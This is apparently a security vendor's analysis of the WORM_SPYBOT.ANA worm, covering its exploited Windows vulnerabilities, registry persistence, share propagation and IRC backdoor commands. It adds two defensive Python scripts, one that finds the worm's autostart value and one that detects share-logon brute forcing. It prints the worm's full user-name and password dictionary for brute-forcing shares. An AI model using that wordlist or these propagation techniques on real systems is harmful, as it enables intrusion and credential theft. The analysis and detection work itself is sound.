WORM_SPYBOT.ANA

Malware type: Worm

Aliases: Backdoor.Win32.Rbot.aph (Kaspersky), W32/Sdbot.worm.gen.g (McAfee), W32.Spybot.Worm (Symantec), EXP/MS05-039.A (Avira), Exp/MS04011-A (Sophos), Backdoor:Win32/Rbot (Microsoft)

In the wild: Yes

Destructive: Yes

Language: English

Platform: Windows NT, 2000, XP, Server 2003

Encrypted: No

Overall risk rating:

Reported infections:

Damage potential:

High

Distribution potential:

High

Infection Channel 1 : Propagates via network shares

Infection Channel 2 : Propagates via software vulnerabilities

Description: 

This memory-resident worm may arrive on an affected computer as a file dropped by other malware, as a file downloaded from the Internet, or as a file installed manually by a user. It propagates through network shares and by exploiting known vulnerabilities, routines that other WORM_SPYBOT variants also employ.

The Windows vulnerabilities it exploits are the following:

  • Buffer Overrun in RPC May Allow Code Execution (MS03-026; MS03-039 is the updated patch)
  • ASN.1 Library Bitstring Heap Overflow vulnerability (MS04-007)
  • LSASS Remote Buffer Overflow vulnerability (MS04-011)

These vulnerabilities are discussed in detail in the corresponding Microsoft security bulletins.

In addition, this worm takes advantage of the Veritas Backup Exec Name Service Remote Buffer Overflow vulnerability.

This worm's backdoor routine turns the affected computer into an Internet Relay Chat (IRC) bot: it opens random ports, connects to an IRC server and joins a particular IRC channel, where it waits for commands from a remote user.

Part of its backdoor routine is launching denial of service (DoS) attacks against particular Web sites using flood methods, such as ICMP flood, UDP flood, and PING flood.

This worm also steals the Microsoft Windows Product ID and the CD keys of certain games. It also uses a built-in packet sniffer, referred to as Carnivore, to capture passwords and other sensitive information from network traffic that contains certain strings.

Furthermore, it prevents the affected system from reaching some antivirus Web sites by modifying the HOSTS file, a system file that maps host names to IP addresses.

This WORM_SPYBOT variant is also classified as destructive because it deletes registry entries.

Description created: Jan. 27, 2006 2:01:42 AM GMT -0800


TECHNICAL DETAILS


File type: PE

Memory resident:  Yes

Size of malware: 271,360 Bytes (compressed)

Ports used: Random

Initial samples received on: Jan 24, 2006

Compression type: Unknown

Vulnerability used:  (MS04-007) ASN.1 Vulnerability Could Allow Code Execution, (MS04-011) Security Update for Microsoft Windows (835732), (MS03-026) Buffer Overrun In RPC Interface Could Allow Code Execution

Payload 1: Modifies HOSTS file

Payload 2: Compromises system security

Payload 3: Performs various denial of service (DoS) attacks

Payload 4: Steals information

Payload 5: Deletes registry entries

Details:

Installation and Autostart Technique

This worm may arrive on an affected computer either as a dropped file of other malware, as a downloaded file from the Internet, or as a manually installed file.

Upon execution, it drops a copy of itself as FIREFOX.EXE in the Windows system folder. Users may mistake this for the legitimate FIREFOX.EXE, the executable of the Mozilla Firefox browser, which is normally installed under Program Files rather than in the system folder.

It then creates the following registry entries to ensure its automatic execution at every system startup. (RunServices keys are processed only by Windows 9x/ME; on the Windows NT, 2000, XP and Server 2003 platforms this worm targets, the Run entries are what actually provide persistence, but all four should be removed.)

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run
Windows Internet Explorer 6 = "firefox.exe"

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices
Windows Internet Explorer 6 = "firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
Windows Internet Explorer 6 = "firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices
Windows Internet Explorer 6 = "firefox.exe"

It also deletes the following registry entries, if present. These are the autostart entries of competing malware (Bagle, Mydoom, Netsky, Sasser, Blaster, Zotob and other bots), so deleting them removes rival infections from the host and leaves this worm in control:

Under the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices

  • Lavan
  • system32.exe
  • Win2KService
  • WinNETService
  • WinNTService
  • WinXPService

Under the registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run

  • avserve.exe
  • avserve2.exe
  • Bagle.ao
  • Bagle.av
  • Bagle.ax
  • Bagle.ay
  • Bagle.v
  • JAVA.EXE
  • JavaVM
  • LSASS SVR
  • lsasss.exe
  • Microsoft Inet Xp..
  • Microsoft Update Machine
  • MSBLAST.exe
  • mscvb32.exe
  • mydoom.bb
  • Mydoom.h
  • Mydoom.q
  • napatch.exe
  • Netsky.r
  • PandaAVEngine
  • PandaAVEngine.exe
  • Penis32.exe
  • rxbot
  • Sasser.a
  • Sasser.b
  • Sasser.d
  • Sasser.e
  • Sasser.f
  • Services
  • SERVICES.EXE
  • skynetave.exe
  • Sobig.c
  • Sysformat
  • sysformat.exe
  • sysinfo.exe
  • System MScvb
  • TaskMon
  • taskmon.exe
  • teekids.exe
  • W32.Blaster
  • W32.Blaster.B
  • W32.Blaster.C
  • win_upd2.exe
  • WINdirect.exe
  • windows auto update
  • wingo
  • wingo.exe
  • Winpsd
  • winpsd.exe
  • wintbp.exe
  • Wintbp.exe
  • wuamgrd.exe
  • zotob.e
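
To confirm these autostart entries on a suspect machine without clicking through Registry Editor, export the four keys with regedit /e and parse the export. The script below is an added example; it is not part of the Trend Micro write-up. It parses a constructed .reg export, flags the worm's Windows Internet Explorer 6 = "firefox.exe" value and, more generally, flags any autostart value that is a bare file name with no directory, because such a value is resolved through the system search path, which is exactly how a copy dropped into %System% gets launched. The sample export, including its VMware Tools and ctfmon.exe entries, is constructed for illustration.

```python
"""Triage Run/RunServices autostart values from a Registry Editor export.

Added example, not part of the Trend Micro write-up. Parses the text that
'regedit /e <file> <key>' (or File > Export) produces and flags:
  * the WORM_SPYBOT.ANA value  Windows Internet Explorer 6 = "firefox.exe"
  * any autostart value that is a bare file name with no directory, since
    such a value is resolved through the system search path (the
    %System% folder included), which is how the dropped copy gets run.
RunServices is honoured only by Windows 9x/ME; on NT-based systems the
Run values are the ones that matter, but both are checked here.
"""
import re

AUTOSTART_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\runservices",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservices",
}

# Constructed export; a real one has the same header and CRLF line endings.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
"Windows Internet Explorer 6"="firefox.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Windows Internet Explorer 6"="firefox.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Windows Internet Explorer 6"="firefox.exe"
"""

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    """Undo .reg escaping (doubled backslash, escaped quote) in one pass."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: string_data}} for REG_SZ values."""
    keys, current = {}, None
    for raw in text.replace("\r\n", "\n").split("\n"):
        line = raw.strip()
        key_match = _KEY_RE.match(line)
        if key_match:
            current = key_match.group(1)
            keys.setdefault(current, {})
            continue
        value_match = _VALUE_RE.match(line)
        if value_match and current is not None:
            name, data = _unescape(value_match.group(1)), value_match.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                keys[current][name] = _unescape(data[1:-1])
            # hex:/dword: data carries no file name and is skipped.
    return keys


def _image_name(command_line):
    """First token of a command line: the quoted path or the first word."""
    command_line = command_line.strip()
    if command_line.startswith('"') and command_line.count('"') >= 2:
        return command_line[1:command_line.index('"', 1)]
    return command_line.split(" ")[0]


def find_suspicious_autostarts(text):
    """Return [(key, value_name, data, reason)] for flagged autostart values."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key.lower() not in AUTOSTART_KEYS:
            continue
        for name, data in values.items():
            image = _image_name(data)
            if name == "Windows Internet Explorer 6" and image.lower() == "firefox.exe":
                findings.append((key, name, data, "WORM_SPYBOT.ANA autostart value"))
            elif "\\" not in image:
                findings.append((key, name, data, "bare file name resolved via search path"))
    return findings
```

Feed it the export of each of the four keys in turn; any finding with a bare file name that you cannot account for deserves the same treatment as the worm's own value, since the search-path trick is not specific to this variant.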

Propagation Routine

This worm spreads via network shares. It enumerates available network shares and drops a copy of itself onto them. It also generates target IP addresses and attempts to drop a copy of itself into the following default administrative shares on each target:

  • ADMIN$
  • ADMIN$\system32
  • C$\Windows\system32
  • C$\WinNT\system32
  • IPC$

If these shares are password-protected, it attempts to log on with combinations of the following user names and passwords:

User names:

  • Abdulrazak
  • Ackerman
  • Adams
  • Addison
  • Adelstein
  • Adibe
  • Adorno
  • Ahlers
  • Alavi
  • Alcorn
  • Aleks
  • Allison
  • Alongi
  • Altavilla
  • Altenberger
  • Altenhofen
  • Amaral
  • Amatangelo
  • Ameer
  • Amsden
  • Anand
  • Andel
  • Andrelus
  • Andron
  • Anfinrud
  • Ansley
  • Anthony
  • Antos
  • Arbia
  • Arduini
  • Arellano
  • Aristotle
  • Arjas
  • Atkins
  • Augustus
  • Aurelius
  • Axelrod
  • Axworthy
  • Ayiemba
  • Aykroyd
  • Ayling
  • Azima
  • Bachmuth
  • Backus
  • Baglivo
  • Bagnold
  • Bailar
  • Bakanowsky
  • Baleja
  • Ballatori
  • Ballew
  • Baltz
  • Banta
  • Barabesi
  • Barajas
  • Baranczak
  • Baranowska
  • Barberi
  • Barbetti
  • Barneson
  • Barnett
  • Barriola
  • Barry
  • Bartholomew
  • Bartolome
  • Bartoo
  • Basavappa
  • Bashevis
  • Batchelder
  • Baumiller
  • Bayles
  • Beacon
  • Beckman
  • Beder
  • Bedford
  • Behenna
  • Belanger
  • Belaoussof
  • Belfer
  • Belin-Collart
  • Bellavance
  • Bellhouse
  • Bellini
  • Belloc
  • Benedict-Dye
  • Bergson
  • Berke-Jenkins
  • Bernardo
  • Bernassola
  • Bernston
  • Berrizbeitia
  • Betti
  • Beynart
  • Biagioli
  • Bickel
  • Binion
  • Bisema
  • Bisho
  • Blackbourn
  • Blackwell
  • Blagg
  • Blakemore
  • Blanke
  • Bliss
  • Blizard
  • Bloch
  • Bloembergen
  • Bloemhof
  • Bloxham
  • Blyth
  • Bolger
  • Bolick
  • Bollinger
  • Bologna
  • Boner
  • Bonham
  • Boniface
  • Bontempo
  • Bookbinder
  • Boone
  • Boorstin
  • Borack
  • Borden
  • Bossi
  • Bothman
  • Botosh
  • Boudin
  • Boudrot
  • Bourneuf
  • Bowers
  • Boxer
  • Boyajian
  • Boyes
  • Boyland
  • Boyne
  • Bracalente
  • Bradac
  • Bradach
  • Brecht
  • Breed
  • Brenan
  • Brennan
  • Brewer
  • Bridgeman
  • Bridges
  • Brinton
  • Britz
  • Broca
  • Brook
  • Brzycki
  • Buchan
  • Budding
  • Bullard
  • Bunton
  • Burden
  • Burdzy
  • Burke
  • Burridge
  • Busetta
  • Byatt
  • Byerly
  • Calnan
  • Cammelli
  • Cammilleri
  • Canley
  • Capanni
  • Caperton
  • Capocaccia
  • Capodilupo
  • Cappuccio
  • Capursi
  • Caratozzolo
  • Carayannopoulos
  • Carlin
  • Carlos
  • Carlyle
  • Carmichael
  • Caroti
  • Carper
  • Cartmill
  • Cascio
  • Caspar
  • Castelda
  • Cavanagh
  • Cavell
  • Ceniceros
  • Cerioli
  • Chapman
  • Charles
  • Cheang
  • Cherry
  • Chervinsky
  • Chiassino
  • Chien
  • Childress
  • Childs
  • Chinipardaz
  • Chinman
  • Christenson
  • Christian
  • Christiano
  • Christie
  • Christopher
  • Chupasko
  • Church
  • Ciampaglia
  • Cicero
  • Cifarelli
  • Claffey
  • Clancy
  • Clark
  • Clement
  • Clifton
  • Coblenz
  • Coito
  • Coldren
  • Colella
  • Collard
  • Collis
  • Compton
  • Comstock
  • Concino
  • Condodina
  • Connors
  • Corey
  • Cornish
  • Cosmides
  • Counter
  • Coutaux
  • Crawford
  • Crocker
  • Croshaw
  • Croxen
  • Croxton
  • Cunningham
  • Currier
  • Cutler
  • Cyders
  • Daldalian
  • D'Ambra
  • Danieli
  • Dante
  • Dapice
  • D'arcangelo
  • Dasgupta
  • daSilva
  • Daskalu
  • David
  • Dawkins
  • Debroff
  • Defeciani
  • DeGennaro
  • DeLaPena
  • Delattre
  • del'Enclos
  • Deleon-Rendon
  • Delger
  • Dell'acqua
  • Deming
  • Dempster
  • Demusz
  • Denault
  • Denham
  • Denison
  • deRousse
  • Desombre
  • Deutsch
  • D'fini
  • Dicks
  • Diefenbach
  • Difabio
  • Difronzo
  • Dilworth
  • Dionysius
  • Dirksen
  • Dockery
  • Doherty
  • Donahue
  • Donner
  • Doonan
  • Dowsland
  • Drinker
  • D'souza
  • Duffin
  • Durrett
  • Dussault
  • Dwyer
  • Eardley
  • Ebeling
  • Eckel
  • Edley
  • Edner
  • Edward
  • Eickenhorst
  • Eliasson
  • Elmendorf
  • Elmerick
  • Elvis
  • Encinas
  • Enyeart
  • Eppling
  • Erbach
  • Erdman
  • Erdos
  • Espinoza
  • Estes
  • Etter
  • Euripides
  • Everett
  • Fabbris
  • Fagan
  • Faioes
  • Falco-Acosta
  • Falorsi
  • Faris
  • Farone
  • Farren
  • Fasso'
  • Fates
  • Feigenbaum
  • Fejzo
  • Feldman
  • Fernald
  • Fernandes
  • Ferrante
  • Ferriell
  • Feuer
  • Field
  • Finkelstein
  • Finnegan
  • Fiorina
  • Fitzmaurice
  • Flier
  • Flores
  • Folks
  • Forester
  • Fortes
  • Fortier
  • Fossey
  • Fossi
  • Francisco
  • Franklin-Kenea
  • Franz
  • Frazier-Davis
  • Freid
  • Freundlich
  • Fried
  • Friedland
  • Frisken
  • Frowiss
  • Fryberger
  • Fujii-Abe
  • Fuller
  • Furth
  • Fusaro
  • Gabrielli
  • Gaggiotti
  • Galeotti
  • Galwey
  • Gambini
  • Garfield
  • Garman
  • Garonna
  • Geller
  • Gemberling
  • Georgi
  • Gerrett
  • Ghorai
  • Gibbens
  • Gibson
  • Gilbert
  • Gillispie
  • Gleason
  • Glegg
  • Glendon
  • Goldfarb
  • Goncalves
  • Gonzalez
  • Goodearl
  • Goody
  • Gozzi
  • Gravell
  • Greenberg
  • Greenfeld
  • Griffiths
  • Grigoletto
  • Grummell
  • Gruner
  • Gruppe
  • Guenthart
  • Hackman
  • Hackshaw
  • Haley
  • Halkias
  • Hallowell
  • Halpert
  • Hambarzumjan
  • Hamer
  • Hammerness
  • Hanssen
  • Harding
  • Hargraves
  • Harlow
  • Harrigan
  • Hartman
  • Hartmann
  • Hartnett
  • Harwell
  • Haviaras
  • Hawkes
  • Hayes
  • Haynes
  • Hazlewood
  • Heermans
  • Heiland
  • Hellman
  • Hellmiss
  • Helprin
  • Hemphill
  • Henery
  • Henrichs
  • Hernandez
  • Herrera
  • Hester
  • Heubert
  • Heyeck
  • Himmelfarb
  • Hirst
  • Hitchcock
  • Hoang
  • Hoffer
  • Hoffman
  • Hokanson
  • Hokoda
  • Holmes
  • Holoien
  • Holter
  • Holway
  • Holzman
  • Hooker
  • Hopkins
  • Horsley
  • Hoshida
  • Hostage
  • Hottle
  • Howard
  • Huidekoper
  • Hungerford
  • Huntington
  • Hurtubise
  • Hutchings
  • Iaquinta
  • Ichikawa
  • Igarashi
  • Inamura
  • Inniss
  • Isaac
  • Isaievych
  • Isbill
  • Isserman
  • Jacenko
  • Jackson
  • Jagers
  • Jagger
  • Jagoe
  • Jamil
  • Janjigian
  • Jarnagin
  • Jarrell
  • Jeffers
  • Jellis
  • Jenkins
  • Jespersen
  • Jewett
  • Johannesson
  • Johannsen
  • Johns
  • Jolly
  • Jorgensen
  • Jucks
  • Juliano
  • Julious
  • Kabbash
  • Kaboolian
  • Kafadar
  • Kalbfleisch
  • Kaligian
  • Kalil
  • Kalinowski
  • Kalman
  • Kamel
  • Kangis
  • Karpouzes
  • Kassower
  • Kasten
  • Kawachi
  • Keenan
  • Keepper
  • Keith
  • Kelker
  • Kelsey
  • Kempton
  • Kemsley
  • Kendall
  • Kerry
  • Khong
  • Kimmel
  • Kimmett
  • Kimura
  • Kindall
  • Kinsley
  • Kippenberger
  • Kirscht
  • Kittridge
  • Kleckner
  • Kleiman
  • Kleinfelder
  • Klemperer
  • Kling
  • Klinkenborg
  • Klint
  • Knuff
  • Kobrick
  • Koivumaki
  • Kommer
  • Koniaris
  • Konrad
  • Korzybski
  • Kotter
  • Kovaks
  • Kraemer
  • Krailo
  • Krasney
  • Kraus
  • Kroemer
  • Krysiak
  • Kuenzli
  • Kumar
  • Kusman
  • Kuwabara
  • Labunka
  • Lafler
  • Laing
  • Lallemant
  • Landes
  • Lankes
  • Lantieri
  • Lanzit
  • Laserna
  • Lashley
  • Lawless
  • Lecar
  • Lecce
  • Leclercq
  • Leite
  • Lenard
  • l'Enclos
  • Lesser
  • Lessi
  • Liakos
  • Lidano
  • Light
  • Lightfoot
  • Linares
  • Linda
  • Linder
  • Linehan
  • Linzee
  • Lippmann
  • Lipponen
  • Little
  • Litvak
  • Livernash
  • Livolsi
  • Lizardo
  • Locatelli
  • Longworth
  • Loveman
  • Lowenstein
  • Lubin
  • Lucas
  • Luciano
  • Luczkow
  • Luecke
  • Lunetta
  • Luoma
  • Lussier
  • Lutcavage
  • Luzader
  • Maccormac
  • Macdonald
  • Maceachern
  • Macintyre
  • Mackenney
  • MacMillan
  • Madigan
  • Maggio
  • Mahony
  • Maier
  • Maine-Hershey
  • Maisano
  • Malatesta
  • Maller
  • Malova
  • Manalis
  • Mandel
  • Manganiello
  • Mantovan
  • March
  • Marchbanks
  • Marcus
  • Margalit
  • Margetts
  • Marques
  • Martinez
  • Martochio
  • Marton
  • Marubini
  • Matalka
  • Matarazzo
  • Matsukata
  • Mattson
  • Mauzy
  • Mazzali
  • Mazziotta
  • Mcbride
  • Mccaffery
  • Mccall
  • Mcclearn
  • Mcdowell
  • Mcelroy
  • McFadden
  • Mcghee
  • Mcgoldrick
  • McIlroy
  • Mcintosh
  • Mckenna
  • Mclane
  • Mclaren
  • Mcnealy
  • Mcnulty
  • Meccariello
  • Memisoglu
  • Menzies
  • Merikoski
  • Merlani
  • Merminod
  • Merseth
  • Metelka
  • Metropolis
  • Meurer
  • Michelman
  • Middle
  • Mieher
  • Mills
  • Minichiello
  • Mitropoulos
  • Mittal
  • Mocroft
  • Modestino
  • Moeller
  • Moiamedi
  • Monque
  • Montilio
  • MooreDeCh.
  • Morani
  • Moreton
  • Morrison
  • Morrow
  • Mortimer
  • Mosher
  • Mosler
  • Mostafavi
  • Motooka
  • Mudarri
  • Muello
  • Mugnai
  • Mulkern
  • Mulroy
  • Mumford
  • Mussachio
  • Naddeo
  • Napolitano
  • Nardi
  • Nardone
  • Naviaux
  • Nayduch
  • Nelson
  • Nenna
  • Nesci
  • Neuman
  • Newfeld
  • Newlin
  • Nickerson
  • Nickoloff
  • Nisenson
  • Nitabach
  • Notman
  • Nuzum
  • Ocougne
  • Ogata
  • O'hagan
  • Oldford
  • Olsen
  • Olson
  • Olszewski
  • O'malley
  • O'meara
  • Orfield
  • Ospina
  • Ostrowski
  • Ottaviani
  • Otten
  • Ouchida
  • PaesDealmeida
  • Paine
  • Palayoor
  • Palepu
  • Pallara
  • Palmitesta
  • Panadero
  • Panizzon
  • Pantilla
  • Paoletti
  • Parmeggiani
  • Parris
  • Partridge
  • Pascucci
  • Patefield
  • Patrick
  • Pattullo
  • Pavetti
  • Pavlon
  • Pawloski
  • Paynter
  • Peabody
  • Pearlberg
  • Pederson
  • Peishel
  • Penny
  • Pereira
  • Perko
  • Perlak
  • Perlman
  • Perna
  • Perone
  • Perrimon
  • Peters
  • Petruzello
  • Pettibone
  • Pettit
  • Pfister
  • Pilbeam
  • Pinot
  • Plancon
  • Plant
  • Plasket
  • Plous
  • Pocobene
  • Poincaire
  • Pointer
  • Poirier
  • Polak
  • Polanyi
  • Politis
  • Poolman
  • Powers
  • Presper
  • Preucel
  • Prevost
  • Pritchard
  • Pritz
  • Proietti
  • Prothrow-Stith
  • Puccia
  • Pynchon
  • Quaday
  • Quetin
  • Rabkin
  • Radeke
  • Rajagopalan
  • Raney
  • Rangan
  • Rankin
  • Rapple
  • Rayport
  • Redden-Tyler
  • Reedquist
  • Reinold
  • Remak
  • Renick
  • Repetto
  • Resnik
  • Richmond
  • Rielly
  • Rindos
  • Rineer
  • Rivera
  • Robinson
  • Rocha
  • Roesler
  • Rogers
  • Ronen
  • Royal
  • Ruderman
  • Ruescher
  • Sabatello
  • Sadler
  • Safire
  • Samson
  • Sanchez-Ramirez
  • Sanna
  • Sapers
  • Sarin
  • Sartore
  • Satin
  • Satta
  • Satterthwaite
  • Sawtell
  • Sayied
  • Scarponi
  • Scepan
  • Scharf
  • Scharlemann
  • Scheiner
  • Schiano
  • Schifini
  • Schilling
  • Schmitt
  • Schossberger
  • Schuman
  • Schutte
  • Schuyler
  • Schwan
  • Schwickrath
  • Scovel
  • Scudder
  • Seaton
  • Seeber
  • Segal
  • Sekler
  • Selvage
  • Sennett
  • Seterdahl
  • Sexton
  • Seyfert
  • Shaikh
  • Shakis
  • Shankland
  • Shanley
  • Shatrov
  • Shavelson
  • Sheats
  • Shepherd
  • Sheppard
  • Shepstone
  • Shesko
  • Shibata
  • Shimon
  • Siesto
  • Sigalot
  • Sigini
  • Signa
  • Silverman
  • Silvetti
  • Sinsabaugh
  • Sirilli
  • Sites
  • Skane
  • Skerry
  • Skoda
  • Sloan
  • Slowe
  • Smilow
  • Sniffen
  • Snodgrass
  • Socolow
  • Solon
  • Somers
  • Sommariva
  • Sorabella
  • Sottak
  • Soukup
  • Soule
  • Soultanian
  • Spanier
  • Sparrow
  • Spaulding
  • Speizer
  • Spence
  • Sperber
  • Spicer
  • Spiegelhalter
  • Spiliotis
  • Spinrad
  • Stalvey
  • Stang
  • Stassinopolus
  • States
  • Statlender
  • Stefani
  • Steiner
  • Stephanian
  • Stepniewska
  • Stewart-Oaten
  • Stiepock
  • Stillwell
  • StMartin
  • Stock
  • Stockton
  • Stockwell
  • Stolzenberg
  • Stonich
  • Storer
  • Stott
  • Strange
  • Strauch
  • Streiff
  • Stringer
  • Sullivan
  • Sumner
  • Surdam
  • Sweeting
  • Sweetser
  • Swindle
  • Tagiuri
  • Talaugon
  • Tambiah
  • Tandler
  • Tanowitz
  • Tatar
  • Taveras
  • Tcherepnin
  • Teague
  • Temes
  • Temmer
  • Tenney
  • Terracini
  • Thavaneswaran
  • Theodos
  • Thibault
  • Thisted
  • Thomsen
  • Throop
  • Tierney
  • Timmons
  • Tofallis
  • Tollestrup
  • Tolls
  • Tolman
  • Tomford
  • Toomer
  • Topulos
  • Torresi
  • Torske
  • Towler
  • Traebert
  • Trenga
  • Trewin
  • Tringali
  • Troiani
  • Truss
  • Tsiatis
  • Tsomides
  • Tsukurov
  • Tudge
  • Tukan
  • Turano
  • Turek
  • Tuttle
  • Twells
  • Tzamarias
  • Ullman
  • Untermeyer
  • Upsdell
  • Urban
  • Urdang-Brown
  • Usdan
  • Uzuner
  • Vacca
  • Valberg
  • Valencia
  • vanAllen
  • Vandenberg
  • Vanheeckeren
  • VanZwet
  • Vasquez
  • Velasquez
  • Venne
  • Verghese
  • Viana
  • Viano
  • Viens
  • Vignola
  • Villarreal
  • Vitali
  • Viviani
  • Voigt
  • VonHoffman
  • Vorhaus
  • Votey
  • Waite
  • Wales
  • Wallenberg
  • Walter
  • Warshafsky
  • Wasowska
  • Waugh
  • Weighart
  • Weingarten
  • Weinhaus
  • Weissbourd
  • Weissman
  • Welles
  • Welsh
  • Wengret
  • Wescott
  • Wetzel
  • Whately
  • Whilton
  • White
  • Whitla
  • Whittaker
  • Wiedersheim
  • Wiener
  • Wilder
  • Wilhelm
  • Wilkin
  • Wilkinson
  • Willstatter
  • Wilson
  • Wooden
  • Woods
  • Woods-Powell
  • Yacono
  • Yamane
  • Yankee
  • Yarchuk
  • Yates
  • Ybarra
  • Yedidia
  • Yesson
  • Yetiv
  • Yoffe
  • Youk-See
  • Zachary
  • Zahedi
  • Zangwill
  • Zegans
  • Zerbini
  • Zoldak
  • Zucconi
  • Zwiers
  • Zytowski

Passwords:

  • 000000
  • 00000000
  • 12345
  • 54321
  • 111111
  • 123456
  • 654321
  • 888888
  • 1234567
  • 11111111
  • 12345678
  • 88888888
  • 0wner
  • 1234qwer
  • 123abc
  • 123asd
  • 123qwe
  • abc123
  • account
  • admin
  • administrador
  • administrat
  • administrateur
  • administrator
  • admins
  • alpha
  • asdfgh
  • Colin
  • command
  • Commander
  • computer
  • Convidado
  • coordinatore
  • database
  • debug
  • default
  • devil
  • Exploited
  • family
  • Fucked
  • Fucker
  • George
  • glass
  • godblessyou
  • government
  • guest
  • Hacked
  • Hacker
  • hotel
  • ihavenopass
  • Internet
  • Inviter
  • Jessus
  • jesus
  • kanri
  • kanri-sha
  • killer
  • Lamer
  • login
  • lover
  • mainhelp
  • manager
  • microsoft
  • monitor
  • Mossad
  • mossaf
  • mysql
  • Nancy
  • network
  • oracle
  • oscar
  • Ospite
  • owner
  • paltalk
  • Paltalk
  • passwd
  • password
  • Pepsi
  • Peter
  • power
  • private
  • public
  • school
  • secret
  • security
  • service
  • services
  • soldier
  • Spider
  • Sserver
  • Stacey
  • Stacy
  • Standard
  • Stefan
  • Steve
  • Steven
  • student
  • Sucker
  • super
  • sybase
  • teacher
  • telnet
  • tivoli
  • Tommy
  • Verwalter
  • Win2003
  • windows
  • WinNt
  • WinXp
  • wwwadmin
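
On each target, the share logon attempts above land in the Windows Security log as a burst of failed network logons from one source cycling through many user names (event ID 529 on the Windows NT, 2000, XP and Server 2003 platforms listed here; 4625 on later versions). The detector below is an added example, not part of the Trend Micro write-up: it runs over constructed, already-parsed events and flags any source that produces many network-logon failures against many distinct accounts inside a short window, while leaving alone a single user who mistypes a password. The IP addresses, the thresholds and the event tuple layout are illustrative assumptions; the user names are taken from the worm's list above.

```python
"""Detect share-logon brute forcing of the kind WORM_SPYBOT.ANA performs.

Added example, not part of the Trend Micro write-up. Input is a list of
already-parsed Windows Security events; the records below are constructed.
Event 529 is the NT/2000/XP/2003 'Logon Failure: Unknown user name or bad
password' ID and 4625 its Vista-and-later equivalent. Logon type 3 is a
network logon, which is what connecting to ADMIN$, C$ or IPC$ produces.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON_IDS = {529, 4625}
NETWORK_LOGON = 3

# Constructed events: (timestamp, event_id, logon_type, source_ip, user).
_SPRAY_USERS = ["Abdulrazak", "Ackerman", "Adams", "Addison", "Adelstein",
                "Adibe", "Adorno", "Ahlers", "Alavi", "Alcorn", "Aleks", "Allison"]
SAMPLE_EVENTS = [
    (datetime(2006, 1, 24, 3, 0, 0) + timedelta(seconds=i), 529, 3, "10.0.0.23", user)
    for i, user in enumerate(_SPRAY_USERS)
] + [
    # One user mistyping a password twice is not a brute force.
    (datetime(2006, 1, 24, 3, 5, 0), 529, 3, "10.0.0.50", "jsmith"),
    (datetime(2006, 1, 24, 3, 5, 7), 529, 3, "10.0.0.50", "jsmith"),
    # A console logon failure (type 2) is not a share connection.
    (datetime(2006, 1, 24, 3, 6, 0), 529, 2, "-", "administrator"),
]


def detect_share_bruteforce(events, window=timedelta(minutes=2),
                            min_failures=10, min_users=5):
    """Return {source_ip: (failures, distinct_users)} for every source that
    produces at least min_failures network-logon failures against at least
    min_users distinct accounts within any span of length `window`.
    The numbers reported are for the first window that qualifies."""
    by_source = defaultdict(list)
    for ts, event_id, logon_type, src, user in events:
        if event_id in FAILED_LOGON_IDS and logon_type == NETWORK_LOGON:
            by_source[src].append((ts, user))

    hits = {}
    for src, attempts in by_source.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Advance the window start until the span fits within `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            span = attempts[start:end + 1]
            users = {user for _, user in span}
            if len(span) >= min_failures and len(users) >= min_users:
                hits[src] = (len(span), len(users))
                break
    return hits
```

The distinct-user requirement is what separates this worm's dictionary attack from an ordinary lockout storm: one account failing repeatedly is a user or a stale service credential, many accounts failing from one address in seconds is a scanner.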

Exploits Used

This worm exploits the following Windows vulnerabilities to propagate across networks:

  • Buffer Overrun in RPC May Allow Code Execution (MS03-026; MS03-039 is the updated patch)
  • ASN.1 Library Bitstring Heap Overflow vulnerability (MS04-007)
  • LSASS Remote Buffer Overflow vulnerability (MS04-011)

These vulnerabilities are discussed in detail in the corresponding Microsoft security bulletins.

Moreover, this worm takes advantage of the Veritas Backup Exec Name Service Remote Buffer Overflow vulnerability.

Backdoor Routine

This worm's backdoor makes the affected computer an Internet Relay Chat (IRC) bot. It opens random ports and connects to an IRC server, then joins a particular IRC channel; once connected, it receives commands from a remote user in that channel. The following commands are used to control the target system and the behavior of the bot:

  • Change the bot's nick
  • Display bot status
  • Display information or messages from a remote user
  • Display system information
  • Display the identification of current code
  • Download and execute files from an FTP or HTTP site
  • Enable and delete shares
  • Enable and disable DCOM
  • Flush DNS cache
  • Generate a new random nick for the bot
  • Log keystrokes
  • Open a file
  • Perform packet sniffing for specific strings
  • Print network information when host matches
  • Resolve IP or host name by DNS
  • Run an MS-DOS command
  • Terminate itself
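
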